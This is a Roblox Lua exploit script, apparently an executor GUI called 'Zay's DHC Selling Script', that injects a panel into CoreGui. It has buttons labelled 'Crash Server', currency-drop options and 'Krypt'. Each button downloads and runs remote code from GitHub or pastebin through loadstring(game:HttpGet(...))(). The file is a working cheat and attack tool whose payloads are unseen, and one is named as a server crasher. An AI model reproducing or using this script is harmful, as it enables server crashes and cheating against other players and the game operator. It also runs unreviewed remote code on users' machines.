-- Made by Zay
local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local ZaysDHCSellingScript = Instance.new("TextLabel")
local CrashServer = Instance.new("TextButton")
local Drop1mDHC = Instance.new("TextButton")
local Drop100kDHC = Instance.new("TextButton")
local Krypt = Instance.new("TextButton")
local MadebyZay = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(59, 59, 59)
main.BorderColor3 = Color3.fromRGB(59, 59, 59)
main.Position = UDim2.new(0.0264750272, 0, 0.229385287, 0)
main.Size = UDim2.new(0, 518, 0, 260)
main.Active = true
main.Draggable = true

ZaysDHCSellingScript.Name = "Zay's DHC Selling Script"
ZaysDHCSellingScript.Parent = main
ZaysDHCSellingScript.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
ZaysDHCSellingScript.BorderColor3 = Color3.fromRGB(59, 59, 59)
ZaysDHCSellingScript.Size = UDim2.new(0, 518, 0, 49)
ZaysDHCSellingScript.Font = Enum.Font.GothamBold
ZaysDHCSellingScript.Text = "Zay's DHC Selling Script"
ZaysDHCSellingScript.TextColor3 = Color3.fromRGB(255, 255, 255)
ZaysDHCSellingScript.TextSize = 30.000

CrashServer.Name = "Crash Server"
CrashServer.Parent = main
CrashServer.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
CrashServer.BorderColor3 = Color3.fromRGB(59, 59, 59)
CrashServer.Position = UDim2.new(0.0347490348, 0, 0.299999982, 0)
CrashServer.Size = UDim2.new(0, 192, 0, 46)
CrashServer.Font = Enum.Font.ArialBold
CrashServer.Text = "Crash Server"
CrashServer.TextColor3 = Color3.fromRGB(255, 255, 255)
CrashServer.TextSize = 25.000
CrashServer.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher",true))()
end)

Drop1mDHC.Name = "Drop 1m DHC"
Drop1mDHC.Parent = main
Drop1mDHC.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
Drop1mDHC.BorderColor3 = Color3.fromRGB(59, 59, 59)
Drop1mDHC.Position = UDim2.new(0.579150558, 0, 0.300000012, 0)
Drop1mDHC.Size = UDim2.new(0, 200, 0, 46)
Drop1mDHC.Font = Enum.Font.ArialBold
Drop1mDHC.Text = "Drop 1m DHC"
Drop1mDHC.TextColor3 = Color3.fromRGB(255, 255, 255)
Drop1mDHC.TextSize = 25.000
Drop1mDHC.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/Bpu474vh",true))()
end)

Drop100kDHC.Name = "Drop 100k DHC"
Drop100kDHC.Parent = main
Drop100kDHC.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
Drop100kDHC.BorderColor3 = Color3.fromRGB(59, 59, 59)
Drop100kDHC.Position = UDim2.new(0.579150558, 0, 0.603846133, 0)
Drop100kDHC.Size = UDim2.new(0, 200, 0, 46)
Drop100kDHC.Font = Enum.Font.ArialBold
Drop100kDHC.Text = "Drop 100k DHC"
Drop100kDHC.TextColor3 = Color3.fromRGB(255, 255, 255)
Drop100kDHC.TextSize = 25.000
Drop100kDHC.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/nZrp0LjN",true))()
end)

Krypt.Name = "Krypt"
Krypt.Parent = main
Krypt.BackgroundColor3 = Color3.fromRGB(42, 42, 42)
Krypt.BorderColor3 = Color3.fromRGB(59, 59, 59)
Krypt.Position = UDim2.new(0.0347490348, 0, 0.603846133, 0)
Krypt.Size = UDim2.new(0, 192, 0, 46)
Krypt.Font = Enum.Font.ArialBold
Krypt.Text = "Krypt"
Krypt.TextColor3 = Color3.fromRGB(255, 255, 255)
Krypt.TextSize = 25.000
Krypt.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://raw.githubusercontent.com/0nly6Ex/krypt/main/loader"))()
end)

MadebyZay.Name = "Made by Zay"
MadebyZay.Parent = main
MadebyZay.BackgroundColor3 = Color3.fromRGB(49, 49, 49)
MadebyZay.BorderColor3 = Color3.fromRGB(49, 49, 49)
MadebyZay.Position = UDim2.new(0.83590734, 0, 0.0461538471, 0)
MadebyZay.Size = UDim2.new(0, 78, 0, 25)
MadebyZay.Font = Enum.Font.SourceSans
MadebyZay.Text = "- Made by Zay"
MadebyZay.TextColor3 = Color3.fromRGB(255, 255, 255)
MadebyZay.TextSize = 14.000
